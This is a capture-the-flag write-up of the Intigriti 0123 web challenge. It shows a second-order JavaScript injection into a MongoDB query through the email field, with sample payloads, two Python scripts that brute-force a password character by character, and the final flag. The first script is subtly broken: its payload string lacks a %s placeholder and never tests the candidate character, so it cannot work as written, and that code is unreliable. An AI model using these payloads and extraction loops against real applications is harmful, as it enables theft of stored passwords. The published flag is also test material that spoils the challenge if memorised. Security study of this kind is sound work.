---
title: "Intigriti Challenge 0123"
date: 2023-01-24T17:47:56+01:00
draft: false
categories:
    - CTF
tags:
    - WEB
    - SQLi
    - MongoDB
---

# Intigriti Challenge 0123

Name  |  URL
--------|---- 
**Intigriti 0123**| **https://challenge-0123.intigriti.io/**

# EXPLOITATION

This challenge unlike others from Intigriti is not about XSS, this is about SQL Injection! Let's take a look to the application :

![<- Not working](/static/HACKING/intigriti-0123-1.png)

We have to find the password of the friend of JacquesPhil which is the flag. Looking around the application we realize that we can create users and set a mail for them :

![<- Not working](/static/HACKING/intigriti-0123-2.png)

![<- Not working](/static/HACKING/intigriti-0123-3.png)

Once done this we can query how much friends does maiky have :

![<- Not working](/static/HACKING/intigriti-0123-4.png)

But what if we create another user with the same mail? 

![<- Not working](/static/HACKING/intigriti-0123-5.png)

This is soooo interesting, with this information we can get an idea of how the application works. After trying some payloads to the mail field this worked :

`maiky@maiky.com" + "`

This makes us suspect that the application is not running a standard MySQL or PostgreSQL database since other payloads, such as `maiky@maiky.com" OR 1=1 -- - "` do not work. It's possible that the application is using MongoDB instead, which would allow us to inject JS code (although RCE is impossible since the JS is sandboxed).

Let's check if it's MongoDB using `maiky@maiky.com" + (1==2 ? "a" : "") + "`

![<- Not working](/static/HACKING/intigriti-0123-6.png)

So we can confirm we're dealing with MongoDB. As we know the password we're looking for starts with `INTIGRITI` so we can use the following payload :

`105F@105F.com" || this.password.startsWith("INTIGRITI") && "" == "`

Using this (since 105F@105F.com does not exist) the server will show us the username whose password starts with INTIGRITI, let's write a script for this, realize that the endpoint `/api/friends?q=` will return `PinkDraconian` if our statement is true.

# SCRIPTS

## No thread script :

```py
import requests
import string

charset = string.ascii_letters + string.digits + "@{}-/()!\"$=^[]:; " #  "_@{}-/()!\"$%=^[]:; "
s = requests.session()

base_url = "https://challenge-0123.intigriti.io:443/"
login_url = base_url + "login.html"
change_mail = base_url + "editor.html"
api_url = base_url + "api/friends?q="

def check_char(username, char):
    # Login and change mail
    data = {"username": username, "password": ''}
    s.post(login_url, data=data)
    payload = {"email": '105F@105F.com" || this.password.startsWith("INTIGRITI") && "" == "' % char}
    s.post(change_mail, data=payload)

    # Check if char matches
    r = s.get(api_url+username)
    if "PinkDraconian" in r.text:
        return True
    return False


def get_flag():
    flag = ""
    finish = False
    y = 1
    while finish == False:
        for char in charset:
            if (check_char("maiky", flag+char)):
                flag += char
                print(char, end='', flush=True)
                y+=1
                break
        else:
            finish = True


get_flag()
```

## Thread script :

I implemented threads like Huli did on his [blog](https://blog.huli.tw/2023/01/23/en/intigriti-0123-second-order-injection/) (check his writeups, they are amazing).

```py
import requests
import string
import concurrent.futures

charset = string.ascii_letters + string.digits + "@{}-/()!\"$=^[]:; " #  "_@{}-/()!\"$%=^[]:; "

flag = "INTIGRITI{"

base_url = "https://challenge-0123.intigriti.io:443/"
login_url = base_url + "login.html"
change_mail = base_url + "editor.html"
api_url = base_url + "api/friends?q="

def check_char(index, char):
    s = requests.session()
    # Login and change mail
    data = {"username": "maiky"+char, "password": 'foo'}
    s.post(login_url, data=data)
    payload = {"email": '105F@105F.com" || this.password.startsWith("INTIGRITI") && this.password[%s] === "%s"  && "" == "' % (index, char)}
    s.post(change_mail, data=payload)

    # Check if char matches
    r = s.get(api_url+"maiky"+char)
    if "PinkDraconian" in r.text:
        return char
    return False

myindex = len(flag)
while len(flag) == 0 or flag[-1] != '}':
  should_break = False
  with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:
      futures = {executor.submit(check_char, myindex, c): c for c in charset}
      for future in concurrent.futures.as_completed(futures):
          index = futures[future]
          data = future.result()
          if data != False and not should_break:
            flag += data
            should_break = True
            print(myindex, flag)
  myindex += 1
```

> INTIGRITI{Y0uD1d1T}